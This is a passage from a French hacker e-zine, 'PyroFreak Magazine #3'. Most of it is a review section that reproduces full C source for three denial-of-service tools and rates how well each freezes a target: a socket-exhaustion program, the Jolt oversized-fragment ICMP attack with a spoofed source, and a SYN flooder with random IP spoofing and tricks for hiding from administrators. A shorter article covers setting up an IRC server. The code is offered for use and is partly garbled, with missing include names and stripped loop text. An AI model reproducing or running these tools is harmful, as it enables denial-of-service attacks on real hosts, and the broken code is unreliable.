cleanly by closing all open connections * before exiting. Often, a remote workstation can be brought * to its knees by saturating its process table via multiple * invocations of sendmail. That's why port 25 (the sendmail * port) is the default. If the target's process table (set * when the target kernel was created) is filled, users will be * unable to execute any shell commands. Many MUDs also crash * when the number of sockets they have open exceeds a certain * number. This program will put stress on MUDs by testing * their limits. If a limit is reached, the MUD will either * crash or will refuse to let new users log in. * * The program is incomplete, in that it doesn't check for * socket timeouts and subsequently reuse timed out sockets. * That means the program can only keep a remote host / mud * locked up until it exhausts its own available new sockets, * or until it has reached MAX_DESCRIPTORS remote connections * as set by the #define statement. * * If the local machine starts issuing error messages, then * the program has failed to saturate the remote host and has * instead reached the limits of the local machine. Use ^C or * the kill command to terminate it. If you are knowledgable * about rebuilding kernels and have access to the root account, * you can build a special kernel that will allow you to reach * a much larger number of open sockets. * * Before running this, be sure to issue the c shell command: * 'limit descriptors nnn' * where nnn is the largest descriptor limit, as revealed * by the 'limit -h' command if applicable. Some unixes may * not have a descriptors category at all. * * This program has been tested with SunOS version 4.1.3, Irix * version 5, and with Linux. * * You don't need to be a privileged user to run it. */ #include #include #include /* needed for Irix */ #include #include #include #include /* needed for Irix */ #include #include #define MAX_DESCRIPTORS 2500 int i, fd[MAX_DESCRIPTORS]; void CatchTERM() { printf("\nCaught sig TERM or INT! Cleaning up.\n"); for( ; i>=0; i--) { if( shutdown( fd[i], 2 ) < 0 ) perror("shutdown"); printf("Closing %i\n", i); if( close( fd[i] ) ) perror("close"); } printf("Done. Committing suicide. ARRGH!\n"); exit (1); } main(argc,argv) int argc; char *argv[]; { int opt,pid; struct sockaddr_in sin[MAX_DESCRIPTORS]; char buf[2]; if( argc < 2 ) { printf("Usage:\t%s address [port]\n", argv[0] ); printf("\twhere address is a numeric internet address\n"); printf("\tand port is an optional port number (default=25)\n"); exit (0); } pid = getpid(); opt = 1; signal( SIGTERM, CatchTERM); signal( SIGINT, CatchTERM); for ( i=0; i 2) ? atoi(argv[2]) : 25); if( connect(fd[i], &sin[i], sizeof(sin[0])) < 0) { printf("connect %i failed.\n",i); perror("connect"); break; } read(fd[i], buf, 1); printf("pid: %i, desc %i\n", pid, i); } } i--; printf("closing connection.\n"); for ( ; i>=0; i-- ) { if( shutdown( fd[i], 2) <0) perror("shutdown"); if( close(fd[i]) ) perror("close"); else printf("closed %i\n", i); } } Commantaire(s) Additionnel(s) : Aucun problème de compilation ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ______________________________________________________________________ Analyse du programme : ssping.c 1.0 Auteur(s) : Jeff w. Roberson URL de téléchargement : Http://www.rootshell.com OS : Linux Note sur 10 : 8/10 Note(s) du programme(s) : Fait gellé l'ordinateur de la cible /* Jolt 1.0 (c) 1997 by Jeff w. Roberson * Please, if you use my code give me credit. Also, if i was the first to * find this glitch, please give me credit. Thats all i ask. * * Ok so all this does is build a really fraggmented over sized packet * and once win95 gets it, and puts it back together it locks. I send * multiple packets by default cause some times it takes a few packets to * totally freeze the host. Maybe its spending processor time to figure * out how to put them back together? I've had reports of people blue * screening from it tho so we'll let Microsoft's boys figure out exactly * what this does to 95. As of now i haven't tested it on NT, but maybe * i will later ;). All of this source wasn't origonally written by me * I just took one of the old programs to kill POSIX and SYSV based * systems and worked on it abit, then made it spoof =). * VallaH (yaway@hotmail.com) * * Update: It apears to work on some older versions of mac os */ /* Yah this is for linux, but i like the BSD ip header better then linux's */ #define __BSD_SOURCE #include #include #include #include #include #include #include #include #include #include int main(int argc, char **argv) { int s,i; char buf[400]; struct ip *ip = (struct ip *)buf; struct icmphdr *icmp = (struct icmphdr *)(ip + 1); struct hostent *hp, *hp2; struct sockaddr_in dst; int offset; int on; int num = 5; if (argc < 3) { printf("Jolt v1.0 Yet ANOTHER windows95(And macOS!) glitch by VallaH (yaway@hotmail.com)\n"); printf("\nusage: %s [number]\n",argv[0]); printf("\tdstaddr is the host your attacking\n"); printf("\tsaddr is the host your spoofing from\n"); printf("\tNumber is the number of packets to send, 5 is the default\n"); printf("\nNOTE: This is based on a bug that used to affect POSIX complient, and SYSV \n\t systems so its nothing new..\n"); printf("\nGreets to Bill Gates! How do ya like this one? :-)\n"); exit(1); } if (argc == 4) num = atoi(argv[3]); for (i=1;i<=num;i++) { on=1; bzero(buf, sizeof buf); if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW )) < 0) { perror("socket"); exit(1); } if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) { perror("IP_HDRINCL"); exit(1); } if ((hp = gethostbyname(argv[1])) == NULL) { if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == -1) { fprintf(stderr, "%s: unknown host\n", argv[1]); exit(1); } } else { bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length); } if ((hp2 = gethostbyname(argv[2])) == NULL) { if ((ip->ip_src.s_addr = inet_addr(argv[2])) == -1) { fprintf(stderr, "%s: unknown host\n", argv[2]); exit(1); } } else { bcopy(hp2->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length); } printf("Sending to %s\n", inet_ntoa(ip->ip_dst)); ip->ip_v = 4; ip->ip_hl = sizeof *ip >> 2; ip->ip_tos = 0; ip->ip_len = htons(sizeof buf); ip->ip_id = htons(4321); ip->ip_off = htons(0); ip->ip_ttl = 255; ip->ip_p = 1; ip->ip_csum = 0; /* kernel fills in */ dst.sin_addr = ip->ip_dst; dst.sin_family = AF_INET; icmp->type = ICMP_ECHO; icmp->code = 0; icmp->checksum = htons(~(ICMP_ECHO << 8)); for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) { ip->ip_off = htons(offset >> 3); if (offset < 65120) ip->ip_off |= htons(0x2000); else ip->ip_len = htons(418); /* make total 65538 */ if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst, sizeof dst) < 0) { fprintf(stderr, "offset %d: ", offset); perror("sendto"); } if (offset == 0) { icmp->type = 0; icmp->code = 0; icmp->checksum = 0; } } close(s); usleep(30000); } return 0; } Commantaire(s) Additionnel(s) : Aucun problème de compilation ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ______________________________________________________________________ Analyse du programme : Syn Flooder Auteur(s) : Zakath, trurl_ et ultima URL de téléchargement : Http://www.rootshell.com OS : Linux Note sur 10 : 8/10 Note(s) du programme(s) : Fait gellé l'ordinateur de la cible /* Syn Flooder by Zakath * TCP Functions by trurl_ (thanks man). * Some more code by Zakath. * Speed/Misc Tweaks/Enhancments -- ultima * Nice Interface -- ultima * Random IP Spoofing Mode -- ultima * How To Use: * Usage is simple. srcaddr is the IP the packets will be spoofed from. * dstaddr is the target machine you are sending the packets to. * low and high ports are the ports you want to send the packets to. * Random IP Spoofing Mode: Instead of typing in a source address, * just use '0'. This will engage the Random IP Spoofing mode, and * the source address will be a random IP instead of a fixed ip. * Released: [4.29.97] * To compile: cc -o synk4 synk4.c * */ #include #include #include #include #include #include #include #include /* These can be handy if you want to run the flooder while the admin is on * this way, it makes it MUCH harder for him to kill your flooder */ /* Ignores all signals except Segfault */ // #define HEALTHY /* Ignores Segfault */ // #define NOSEGV /* Changes what shows up in ps -aux to whatever this is defined to */ // #define HIDDEN "vi .cshrc" #define SEQ 0x28376839 #define getrandom(min, max) ((rand() % (int)(((max)+1) - (min))) + (min)) unsigned long send_seq, ack_seq, srcport; char flood = 0; int sock, ssock, curc, cnt; /* Check Sum */ unsigned short ip_sum (addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return (answer); } void sig_exit(int crap) { #ifndef HEALTHY printf("Signal Caught. Exiting Cleanly.\n"); exit(crap); #endif } void sig_segv(int crap) { #ifndef NOSEGV printf("Segmentation Violation Caught. Exiting Cleanly.\n"); exit(crap); #endif } unsigned long getaddr(char *name) { struct hostent *hep; hep=gethostbyname(name); if(!hep) { fprintf(stderr, "Unknown host %s\n", name); exit(1); } return *(unsigned long *)hep->h_addr; } void send_tcp_segment(struct iphdr *ih, struct tcphdr *th, char *data, int dlen) { char buf[65536]; struct { /* rfc 793 tcp pseudo-header */ unsigned long saddr, daddr; char mbz; char ptcl; unsigned short tcpl; } ph; struct sockaddr_in sin; /* how necessary is this, given that the destination address is already in the ip header? */ ph.saddr=ih->saddr; ph.daddr=ih->daddr; ph.mbz=0; ph.ptcl=IPPROTO_TCP; ph.tcpl=htons(sizeof(*th)+dlen); memcpy(buf, &ph, sizeof(ph)); memcpy(buf+sizeof(ph), th, sizeof(*th)); memcpy(buf+sizeof(ph)+sizeof(*th), data, dlen); memset(buf+sizeof(ph)+sizeof(*th)+dlen, 0, 4); th->check=ip_sum(buf, (sizeof(ph)+sizeof(*th)+dlen+1)&~1); memcpy(buf, ih, 4*ih->ihl); memcpy(buf+4*ih->ihl, th, sizeof(*th)); memcpy(buf+4*ih->ihl+sizeof(*th), data, dlen); memset(buf+4*ih->ihl+sizeof(*th)+dlen, 0, 4); ih->check=ip_sum(buf, (4*ih->ihl + sizeof(*th)+ dlen + 1) & ~1); memcpy(buf, ih, 4*ih->ihl); sin.sin_family=AF_INET; sin.sin_port=th->dest; sin.sin_addr.s_addr=ih->daddr; if(sendto(ssock, buf, 4*ih->ihl + sizeof(*th)+ dlen, 0, &sin, sizeof(sin))<0) { printf("Error sending syn packet.\n"); perror(""); exit(1); } } unsigned long spoof_open(unsigned long my_ip, unsigned long their_ip, unsigned short port) { int i, s; struct iphdr ih; struct tcphdr th; struct sockaddr_in sin; int sinsize; unsigned short myport=6969; char buf[1024]; struct timeval tv; ih.version=4; ih.ihl=5; ih.tos=0; /* XXX is this normal? */ ih.tot_len=sizeof(ih)+sizeof(th); ih.id=htons(random()); ih.frag_off=0; ih.ttl=30; ih.protocol=IPPROTO_TCP; ih.check=0; ih.saddr=my_ip; ih.daddr=their_ip; th.source=htons(srcport); th.dest=htons(port); th.seq=htonl(SEQ); th.doff=sizeof(th)/4; th.ack_seq=0; th.res1=0; th.fin=0; th.syn=1; th.rst=0; th.psh=0; th.ack=0; th.urg=0; th.res2=0; th.window=htons(65535); th.check=0; th.urg_ptr=0; gettimeofday(&tv, 0); send_tcp_segment(&ih, &th, "", 0); send_seq = SEQ+1+strlen(buf); } void upsc() { int i; char schar; switch(cnt) { case 0: { schar = '|'; break; } case 1: { schar = '/'; break; } case 2: { schar = '-'; break; } case 3: { schar = '\\'; break; } case 4: { schar = '|'; cnt = 0; break; } } printf("[%c] %d", schar, curc); cnt++; for(i=0; i<26; i++) { i++; curc++; } } void init_signals() { // Every Signal known to man. If one gives you an error, comment it out! signal(SIGHUP, sig_exit); signal(SIGINT, sig_exit); signal(SIGQUIT, sig_exit); signal(SIGILL, sig_exit); signal(SIGTRAP, sig_exit); signal(SIGIOT, sig_exit); signal(SIGBUS, sig_exit); signal(SIGFPE, sig_exit); signal(SIGKILL, sig_exit); signal(SIGUSR1, sig_exit); signal(SIGSEGV, sig_segv); signal(SIGUSR2, sig_exit); signal(SIGPIPE, sig_exit); signal(SIGALRM, sig_exit); signal(SIGTERM, sig_exit); signal(SIGCHLD, sig_exit); signal(SIGCONT, sig_exit); signal(SIGSTOP, sig_exit); signal(SIGTSTP, sig_exit); signal(SIGTTIN, sig_exit); signal(SIGTTOU, sig_exit); signal(SIGURG, sig_exit); signal(SIGXCPU, sig_exit); signal(SIGXFSZ, sig_exit); signal(SIGVTALRM, sig_exit); signal(SIGPROF, sig_exit); signal(SIGWINCH, sig_exit); signal(SIGIO, sig_exit); signal(SIGPWR, sig_exit); } main(int argc, char **argv) { int i, x, max, floodloop, diff, urip, a, b, c, d; unsigned long them, me_fake; unsigned lowport, highport; char buf[1024], *junk; init_signals(); #ifdef HIDDEN for (i = argc-1; i >= 0; i--) /* Some people like bzero...i prefer memset :) */ memset(argv[i], 0, strlen(argv[i])); strcpy(argv[0], HIDDEN); #endif if(argc<5) { printf("Usage: %s srcaddr dstaddr low high\n", argv[0]); printf(" If srcaddr is 0, random addresses will be used\n\n\n"); exit(1); } if( atoi(argv[1]) == 0 ) urip = 1; else me_fake=getaddr(argv[1]); them=getaddr(argv[2]); lowport=atoi(argv[3]); highport=atoi(argv[4]); srandom(time(0)); ssock=socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if(ssock<0) { perror("socket (raw)"); exit(1); } sock=socket(AF_INET, SOCK_RAW, IPPROTO_TCP); if(sock<0) { perror("socket"); exit(1); } junk = (char *)malloc(1024); max = 1500; i = 1; diff = (highport - lowport); if (diff > -1) { printf("\n\nCopyright (c) 1980, 1983, 1986, 1988, 1990, 1991 The Regents of the University\n of California. All Rights Reserved."); for (i=1;i>0;i++) { srandom((time(0)+i)); srcport = getrandom(1, max)+1000; for (x=lowport;x<=highport;x++) { if ( urip == 1 ) { a = getrandom(0, 255); b = getrandom(0, 255); c = getrandom(0, 255); d = getrandom(0, 255); sprintf(junk, "%i.%i.%i.%i", a, b, c, d); me_fake = getaddr(junk); } spoof_open(/*0xe1e26d0a*/ me_fake, them, x); /* A fair delay. Good for a 28.8 connection */ usleep(300); if (!(floodloop = (floodloop+1)%(diff+1))) { upsc(); fflush(stdout); } } } } else { printf("High port must be greater than Low port.\n"); exit(1); } } Commantaire(s) Additionnel(s) : Problème de compilation ;)) ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Conclusion : Donc, voilà pour ce zine. Continuer à le lire et souvenez-vous qu'à chaque ezine que Pyro-Phreak mag va sortir, il va y avoir une section comme cella qui va vous faire part des bons programmes qu'il existe. ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3 : | Les IRCD (Internet Relay Chat Deamon) '.________ __ __ ___________ ____ ______________ ____Par Nuclear__ __ P.S:Essayer de pas voir les fautes d'orthographes:)) Dans l'article qui va suivre, je vais vous expliquez comment cree un serveur IRC (IRCD). Cela peux-etre tres utiles si vous avez un Modem Cable ou une ligne ISDN. Je vais vous dire tout ce que je sais sur ses serveurs, et vous dire comment l'installer et le Linker a d'autres serveurs (Configurer en HUB ou CService 5.1 et Uworld 8.1) Pour commencer voici l'histoire d'IRC et les dates importantes: Aout 88 - Premier Serveur irc (tolsun.oulu.fi) Aout 89 - Premer Clients irc cree par Michael Sandrof (BigCheese) Enfin pu besoin d'utiliser un Emulateur Telnet Juin 90 - 2.5beta Creation de channels, avant on avais selement 1 channels principal Juillet 90 - 12 users on 38 servers (un record a cette date) Aout 90 - Association entre les serveur EFnet (Eris Free) et Anet (Anarchy) Sep 90 - 86 serveurs linker sur le reseau de EfNet et Anet Sep 90 - 41 users 86 servers (du a l'alience de Efnet et Anet) Nov 90 - version 2.6 released (ircd Hybrid 2.6) Dec 90 - ircII 2.0beta10 (un clients Unix) Jan 91 - ircd version 2.6.1 adds flow control.. Feb 91 - Record 8.8 gigs de message irc et d'autres on passer dans le reseau de Efnet Mar 91 - 135 servers 69 us 66 non us Oct 91 - 399 users 120 servers 44 opers Été 92 - Premiere ICMP attacks sur les serveur de efnet xxxx 94 - irc.colorado.edu hits 1000 users (Record abatus! 1000 usager sur le serveur, hehe sai pas a quoi yetais linker lui) Plus tard en 94 - IRC hits 5,000 users Oct 95 - IRC hits 15,000 users (boum la l'irc est bien connu.) Fev 96 - Nouveau record: 1556 user on chatter en meme temps sur le channels #quake Avril 97 - en Avril 1997 30,000 users sur le meme serveur Oct 97 - smurf.c est distribuer a tout ceux qui desirais faire des attaque a efnet ,efnet en a beaucoup souffert! Jan 98 - IRC hits 40,000 users Sep 98 - irc.blackened.com Ce serveur de efnet a supporter 8000 clients. Fev 99 - irc.idle.net le mois passer ce serveur efnet a supporter 10000 clients. Fev 99 - IRC hits 50,000 users Bon, c'était la petite histoire IRC, maitenent voici comment vous cree un serveur sous linux et Unix (desole pour ceux en win9x ou nt... les serveurs en win son toujours en split! je perd pas mon temps avec ca!: Premiere chose, se trouver un ircd... Je vous conseille IRCU2.10.04, le 2.10.05 est sortie mais il y a encore beaucoup de bug... Vous pouvez trouver le serveur ircu a http://www.routing-com.undernet.org. Maintenant ,il ne vous reste qu'a installer celui-ci... Decompresser le fichier .tar.gz qui devrais ce retrouver dans le dir /ircu2.10.04 faites ./configure apres make config la ces un peux plus compliqué, mais avec plusieurs essaient, ca devrais marcher. La moitié de la configuration est faite. Apres tapez make ensuite make install. Bon tout est la, il ne vous reste seulement a cree un fichier ircd.conf (vous devez le cree dans le repertoire que vous avez specifié dans make config), pour vous aider aller a www.routing-com.undernet.org ,dans Exemple IRCD.CONF. Ensuite, l'enregistrer dans un fichier ircd.conf et le configurer selon vos besoins. Il y a de l'aide en anglais sur la pages que je viens de vous donnez pour bien le configurer Maintenant, tester votres ircd en tappent ./ircd ,dans le repertoir que vous avez specifier pour mettre les fichiers executables. Tester ensuite si ca marche en vous connectant a votre serveur . Si ca marche ces deja tres bien... sinon recompiler votres ircd en debug mode... il va vous dire ou son les problemes quand vous aller le starter... Ensuite Uworld et Cservice voice les C/N et U lines a additionnner dans votres ircd.conf : Uworld: C:216.46.2.35:uw8nuc:Uworld.NewNet.Optima-Dialup.Com:6651:80 N:216.46.2.35:password:Uworld.NewNet.Optima-Dialup.Com:6651:80 bon voici la description: L'IP DE LA MACHINE:LE PASSWORD:LE NOM DU SERVEUR QUI SE CONNECT A VOUS:LE PORT A UTILISER:80 Le N: ces la meme chose Les U lines: U:Uworld.NewNet.Optima-Dialup.Com:: U:Uworld2.Newnet.Org::* U:Channels.NewNet.Optima-Dialup.Com::* U:Channels2.Newnet.Org::* Ca c'est vraiment Simple vous ecrivez: U:LE NOM DU SERVEUR::* vous devez seulement le mettres pour les serveur Uworld X2 ou CS ,car c'est les lignes qui font que les Services sur ces serveurs peuve se op... Ces tout pour le moment ... Si je pense a de quoi qui pourais plus vous aidez je vais le mettres dans le #4 . Si vous avez besoin de plus d'aide vous pouvez me rejoindre au serveur: newnet.optima-dialup.com sur le channel #cservice, sous le nick de: NuClEaR ou par e-mail a admin@info-shell.com si vous chercher des bon shell et pas cher: http://www.info-shell.com P.S: Je cherche des serveurs assez rapides pour linker au mien... si ca vous interesse contacter moi... En passant, vener faire un tour sur /server newnet.optima-dialup.com ,vous avez un W et X a votres disposition, et des IRCop tres corect! (Snowcrach, PsYkAoS, NuClEaR, Neuro & [Ewoks]... ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3 : | Conclusion '.________ __ __ ___________ ____ ______________ ____Par Neuro__ __ Bon, c'est la fin, si vous lisez ceci, c'est surement que vous avez asser aimer le mag pour le lire jusqu'a la fin,tk,j'espere que vous avez aimer. Si vous désirer faire publier votre article dans le #4, envoyez le a pyrofreakmag@hotmail.com , ou via IRC (#phreak.fr UNDERNET) Site web:http://pyrofreak.cjb.net . Le #4 est fixer pour environ le 1er Mai. Pour commentaires ou suggestions : pyrofreakmag@hotmail.com Site du mois(pub): http://shivatek.citeweb.net @@@@@@@@@@@@@@@@@@@@Pyrofreakmag touts droits réservés@@@@@@@@@@@@@@@@@@@@@@